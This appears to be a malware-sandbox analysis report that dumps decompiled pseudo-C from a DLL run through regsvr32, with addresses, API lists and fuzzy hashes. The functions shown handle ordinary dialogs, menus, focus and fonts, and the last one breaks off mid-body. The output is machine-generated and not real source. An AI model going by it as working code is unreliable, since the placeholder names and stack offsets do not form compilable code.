                                                                                                                • API ID: TypeUserWrite$Class$FreeReadTask$Convert
                                                                                                                • String ID:
                                                                                                                • API String ID: 2659014025-0
                                                                                                                • Opcode ID: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
                                                                                                                • Instruction ID: 441097951dd2468e5e3aeabd33f44de0db15768635f554f72f32f7408884e4a5
                                                                                                                • Opcode Fuzzy Hash: 1e346744f23a1ae00a927adf964772df9ce929b9dd4d2651f53c700e99dacc8b
                                                                                                                • Instruction Fuzzy Hash: CA21F77590012EAFEF01DFA5CD849EEBBF9FF4A290F550166E500F2110DB759A46CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001BC23 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1001BC23(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
				_t104 = __ecx;
				_push(0x3c);
				E10047680(0x1008f034, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1001E302(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1001E302(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E100172B0(_t103, _t104, 0, _t129, _t136, 0x10);
				E100172B0(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10047725(_t65);
					}
					L1000140B(_t132 - 0x1c, E100184C0());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E1002A6E2(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x100bdccc; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E1001628E(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1001B5C0, 0);
							L100013E3( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E10014092(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E1002A662(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E1002A5C0(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E1002A0EA(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E1002A0DC(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1001BBE2(_t103, _t132 - 0x1c, _t124, 0, _t130, _t132, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}
















                                                                                                                0x1001bc23
                                                                                                                0x1001bc23
                                                                                                                0x1001bc23
                                                                                                                0x1001bc23
                                                                                                                0x1001bc2a
                                                                                                                0x1001bc2f
                                                                                                                0x1001bc31
                                                                                                                0x1001bc36
                                                                                                                0x1001bc39
                                                                                                                0x1001bc43
                                                                                                                0x1001bc43
                                                                                                                0x1001bc4b
                                                                                                                0x1001bc50
                                                                                                                0x1001bc53
                                                                                                                0x1001bc56
                                                                                                                0x1001bc59
                                                                                                                0x1001bc63
                                                                                                                0x1001bc6a
                                                                                                                0x1001bc97
                                                                                                                0x1001bc9a
                                                                                                                0x1001bc9a
                                                                                                                0x1001bc9c
                                                                                                                0x1001bc7e
                                                                                                                0x1001bc7e
                                                                                                                0x1001be0b
                                                                                                                0x1001be10
                                                                                                                0x1001be10
                                                                                                                0x1001bca7
                                                                                                                0x1001bcb5
                                                                                                                0x1001bcb9
                                                                                                                0x1001bcc6
                                                                                                                0x1001bccb
                                                                                                                0x1001bcd1
                                                                                                                0x1001bcd3
                                                                                                                0x1001bd09
                                                                                                                0x1001bd09
                                                                                                                0x1001bd0b
                                                                                                                0x1001bd4c
                                                                                                                0x1001bd4c
                                                                                                                0x1001bd50
                                                                                                                0x1001bd55
                                                                                                                0x1001bd5a
                                                                                                                0x1001bd5d
                                                                                                                0x1001bd5f
                                                                                                                0x1001bd65
                                                                                                                0x1001bd61
                                                                                                                0x1001bd61
                                                                                                                0x1001bd61
                                                                                                                0x1001bd7f
                                                                                                                0x1001bd81
                                                                                                                0x1001bd86
                                                                                                                0x1001bda8
                                                                                                                0x1001bdab
                                                                                                                0x1001bdad
                                                                                                                0x1001bdb5
                                                                                                                0x1001bdb8
                                                                                                                0x1001bdba
                                                                                                                0x1001bdc1
                                                                                                                0x1001bdc1
                                                                                                                0x1001bdba
                                                                                                                0x1001bdc7
                                                                                                                0x1001bdcc
                                                                                                                0x1001bdce
                                                                                                                0x1001bdd4
                                                                                                                0x1001bdd4
                                                                                                                0x1001bdda
                                                                                                                0x1001bddc
                                                                                                                0x1001bdde
                                                                                                                0x1001bde2
                                                                                                                0x1001bde5
                                                                                                                0x1001bdeb
                                                                                                                0x1001bdeb
                                                                                                                0x1001bdeb
                                                                                                                0x1001bde2
                                                                                                                0x1001bded
                                                                                                                0x1001bdf0
                                                                                                                0x1001bdf5
                                                                                                                0x1001bdfe
                                                                                                                0x1001bdfe
                                                                                                                0x1001be06
                                                                                                                0x1001be08
                                                                                                                0x1001be08
                                                                                                                0x1001be08
                                                                                                                0x00000000
                                                                                                                0x1001be08
                                                                                                                0x1001bd0d
                                                                                                                0x1001bd11
                                                                                                                0x1001bd1c
                                                                                                                0x1001bd20
                                                                                                                0x1001bd30
                                                                                                                0x1001bd33
                                                                                                                0x1001bd37
                                                                                                                0x1001bd3c
                                                                                                                0x1001bd3f
                                                                                                                0x1001bd4a
                                                                                                                0x1001bd4a
                                                                                                                0x00000000
                                                                                                                0x1001bd3f
                                                                                                                0x1001bcd5
                                                                                                                0x1001bcd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bce1
                                                                                                                0x1001bce3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bced
                                                                                                                0x1001bcf4
                                                                                                                0x1001bcf9
                                                                                                                0x1001bcfb
                                                                                                                0x1001bcfd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001bcff
                                                                                                                0x1001bd04
                                                                                                                0x1001bd06
                                                                                                                0x1001bd06
                                                                                                                0x00000000
                                                                                                                0x1001bd04
                                                                                                                0x1001bc71
                                                                                                                0x1001bc7c
                                                                                                                0x1001bc93
                                                                                                                0x00000000
                                                                                                                0x1001bc93
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1001BC2A
                                                                                                                • GetSystemMetrics.USER32 ref: 1001BCDB
                                                                                                                • GlobalLock.KERNEL32 ref: 1001BD44
                                                                                                                • CreateDialogIndirectParamA.USER32(?,?,?,1001B5C0,00000000), ref: 1001BD73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                • String ID: MS Shell Dlg
                                                                                                                • API String ID: 1736106359-76309092
                                                                                                                • Opcode ID: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
                                                                                                                • Instruction ID: e85eb02237999a7012c7b0064b89368cd0961b399c4234c762095ab2dcff7244
                                                                                                                • Opcode Fuzzy Hash: a423982cdb4445666ff142e75d3f275899161f5a5907fd303f69c14c7b230c9c
                                                                                                                • Instruction Fuzzy Hash: 4A51DC309006099BCB09DFA8C8859EEBBB5EF45340F254569F941EF192EB34DE80CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001EB7A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001EB7A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t44;
				int _t53;
				intOrPtr _t58;
				int _t60;
				void* _t63;
				void* _t72;
				void* _t88;
				intOrPtr _t90;
				struct tagMENUITEMINFOA _t92;
				intOrPtr _t97;
				void* _t98;

				_t88 = __edx;
				_push(0x64);
				_t44 = E1004764D(0x1008f3dd, __ebx, __edi, __esi);
				_t72 = __ecx;
				_t97 =  *((intOrPtr*)(_t98 + 8));
				_t90 =  *((intOrPtr*)(_t97 + 0x14));
				if(_t90 != 0) {
					L1000140B(_t98 + 8, E100184C0());
					 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
					GetObjectA( *(_t90 + 4), 0x18, _t98 - 0x40);
					 *(_t98 - 0x10) =  *((intOrPtr*)(_t98 - 0x38)) + 2;
					if(GetSystemMetrics(0xf) <=  *(_t98 - 0x10)) {
						_t53 =  *(_t98 - 0x10);
					} else {
						_t53 = GetSystemMetrics(0xf);
					}
					_t92 = 0x30;
					 *(_t97 + 0x10) = _t53;
					E10049170(_t92, _t98 - 0x70, 0, _t92);
					 *(_t98 - 0x70) = _t92;
					 *((intOrPtr*)(_t98 - 0x6c)) = 0x40;
					if(GetMenuItemInfoA( *(_t72 + 4),  *(_t97 + 8), 0, _t98 - 0x70) != 0) {
						_t58 = L100011F4(_t98 + 8,  *((intOrPtr*)(_t98 - 0x48)));
						 *((intOrPtr*)(_t98 - 0x48)) =  *((intOrPtr*)(_t98 - 0x48)) + 1;
						 *((intOrPtr*)(_t98 - 0x4c)) = _t58;
						_t60 = GetMenuItemInfoA( *(_t72 + 4),  *(_t97 + 8), 0, _t98 - 0x70);
						_t94 = _t60;
						E1000FED3(_t98 + 8, 0xffffffff);
						_t105 = _t60;
						if(_t60 != 0) {
							_push(0);
							L1000CDFE(_t72, _t98 - 0x28, _t94, _t97, _t105);
							_t73 = _t72 + 8;
							 *(_t98 - 4) = 1;
							_t63 = E1000D180(_t98 - 0x28, _t72 + 8);
							E1001E5E1(_t98 - 0x28, _t98 - 0x14, _t98 + 8);
							E1000D180(_t98 - 0x28, _t63);
							_t38 =  *((intOrPtr*)(_t98 - 0x3c)) + 5; // 0x5
							 *((intOrPtr*)(_t97 + 0xc)) =  *((intOrPtr*)(_t98 - 0x14)) + _t38;
							 *(_t98 - 4) = 0;
							L1000CE52(_t72 + 8, _t98 - 0x28, _t63, _t97, _t73);
						}
					}
					_t44 = L100013E3( *((intOrPtr*)(_t98 + 8)) + 0xfffffff0, _t88);
				}
				return E10047725(_t44);
			}














                                                                                                                0x1001eb7a
                                                                                                                0x1001eb7a
                                                                                                                0x1001eb81
                                                                                                                0x1001eb86
                                                                                                                0x1001eb88
                                                                                                                0x1001eb8b
                                                                                                                0x1001eb90
                                                                                                                0x1001eb9f
                                                                                                                0x1001eba4
                                                                                                                0x1001ebb1
                                                                                                                0x1001ebc5
                                                                                                                0x1001ebcd
                                                                                                                0x1001ebd5
                                                                                                                0x1001ebcf
                                                                                                                0x1001ebd1
                                                                                                                0x1001ebd1
                                                                                                                0x1001ebda
                                                                                                                0x1001ebdc
                                                                                                                0x1001ebe5
                                                                                                                0x1001ebfa
                                                                                                                0x1001ec03
                                                                                                                0x1001ec0e
                                                                                                                0x1001ec16
                                                                                                                0x1001ec1b
                                                                                                                0x1001ec22
                                                                                                                0x1001ec2e
                                                                                                                0x1001ec35
                                                                                                                0x1001ec37
                                                                                                                0x1001ec3c
                                                                                                                0x1001ec3e
                                                                                                                0x1001ec40
                                                                                                                0x1001ec45
                                                                                                                0x1001ec4a
                                                                                                                0x1001ec51
                                                                                                                0x1001ec55
                                                                                                                0x1001ec67
                                                                                                                0x1001ec70
                                                                                                                0x1001ec7b
                                                                                                                0x1001ec82
                                                                                                                0x1001ec85
                                                                                                                0x1001ec89
                                                                                                                0x1001ec89
                                                                                                                0x1001ec3e
                                                                                                                0x1001ec94
                                                                                                                0x1001ec94
                                                                                                                0x1001ec9e

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenuMetricsSystem$H_prolog3Object_memset
                                                                                                                • String ID: @
                                                                                                                • API String ID: 787892162-2766056989
                                                                                                                • Opcode ID: 4f0dc529519df66b90fbddec5008491fbcebfbe0435278c1ac25511a20f02242
                                                                                                                • Instruction ID: b4ddfc55109ff15101dbaac637e92cf7cf6d8893634dfa4a76668b402afad949
                                                                                                                • Opcode Fuzzy Hash: 4f0dc529519df66b90fbddec5008491fbcebfbe0435278c1ac25511a20f02242
                                                                                                                • Instruction Fuzzy Hash: B8316B75900209ABDB10DFA4CD81FEEBBB8FF54354F144129F515AB292EB70AA46CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001593A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1001593A(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* __ebp;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;
				void* _t44;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E10015912(__ebx, __ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E1001799A(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E10013FEA(_t30, _t34, _t44, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}

















                                                                                                                0x1001593a
                                                                                                                0x1001593d
                                                                                                                0x10015940
                                                                                                                0x10015942
                                                                                                                0x1001594a
                                                                                                                0x10015950
                                                                                                                0x10015954
                                                                                                                0x10015959
                                                                                                                0x100159d9
                                                                                                                0x100159de
                                                                                                                0x100159f0
                                                                                                                0x100159f0
                                                                                                                0x00000000
                                                                                                                0x100159e4
                                                                                                                0x100159e6
                                                                                                                0x100159eb
                                                                                                                0x100159ed
                                                                                                                0x100159f2
                                                                                                                0x100159f5
                                                                                                                0x100159f5
                                                                                                                0x100159de
                                                                                                                0x1001595b
                                                                                                                0x1001595e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10015960
                                                                                                                0x10015963
                                                                                                                0x10015976
                                                                                                                0x10015980
                                                                                                                0x10015982
                                                                                                                0x10015983
                                                                                                                0x10015995
                                                                                                                0x1001599b
                                                                                                                0x100159ae
                                                                                                                0x100159bf
                                                                                                                0x100159c2
                                                                                                                0x100159c2
                                                                                                                0x100159cc
                                                                                                                0x100159d1
                                                                                                                0x100159d1
                                                                                                                0x100159cc
                                                                                                                0x10015980
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveFocus$MessageSend
                                                                                                                • String ID: u
                                                                                                                • API String ID: 1556911595-4067256894
                                                                                                                • Opcode ID: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
                                                                                                                • Instruction ID: 07e167e0145e98c525f9007698f833c98e51d59fe92ab2647bdf042b11ac3786
                                                                                                                • Opcode Fuzzy Hash: e5e53b18d9a7c366fb47b6aecd64b0bcb1539c99c57c71f07f20d61b63d9c445
                                                                                                                • Instruction Fuzzy Hash: A011E632900215EBEB10EB75CD05AAE7EA9EF443B2F044126ED46DE161D636DD80DBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002A5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1002A5C0(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x100b9e70; // 0xbb35530
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E1004763E(E1002A471(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                                                                                                                0x1002a5c6
                                                                                                                0x1002a5cd
                                                                                                                0x1002a5d2
                                                                                                                0x1002a5db
                                                                                                                0x1002a5de
                                                                                                                0x1002a5e1
                                                                                                                0x1002a5e6
                                                                                                                0x1002a5ea
                                                                                                                0x1002a5f4
                                                                                                                0x1002a603
                                                                                                                0x1002a607
                                                                                                                0x1002a614
                                                                                                                0x1002a616
                                                                                                                0x1002a618
                                                                                                                0x1002a618
                                                                                                                0x1002a633
                                                                                                                0x1002a636
                                                                                                                0x1002a636
                                                                                                                0x1002a63c
                                                                                                                0x1002a63c
                                                                                                                0x1002a642
                                                                                                                0x1002a644
                                                                                                                0x1002a644
                                                                                                                0x1002a65f
                                                                                                                0x1002a65f
                                                                                                                0x1002a5ee
                                                                                                                0x1002a5f2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000011), ref: 1002A5E6
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 1002A5EE
                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002A5FB
                                                                                                                • GetDC.USER32(00000000), ref: 1002A60A
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A61E
                                                                                                                • MulDiv.KERNEL32 ref: 1002A62A
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 1002A636
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                • String ID: System
                                                                                                                • API String ID: 46613423-3470857405
                                                                                                                • Opcode ID: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
                                                                                                                • Instruction ID: 6fa32537bea77ea401c086acbfad8471d090d4f731cd6c3d02efb41ce348b637
                                                                                                                • Opcode Fuzzy Hash: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
                                                                                                                • Instruction Fuzzy Hash: 6711BF71A40268EBEB00DBA0DD89FAE7BB8EF46781F400055FA02A6181DFB49D41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003A2DF Relevance: 13.8, APIs: 9, Instructions: 253stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1003A2DF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E100476EC(0x10090ee9, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1001E397(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
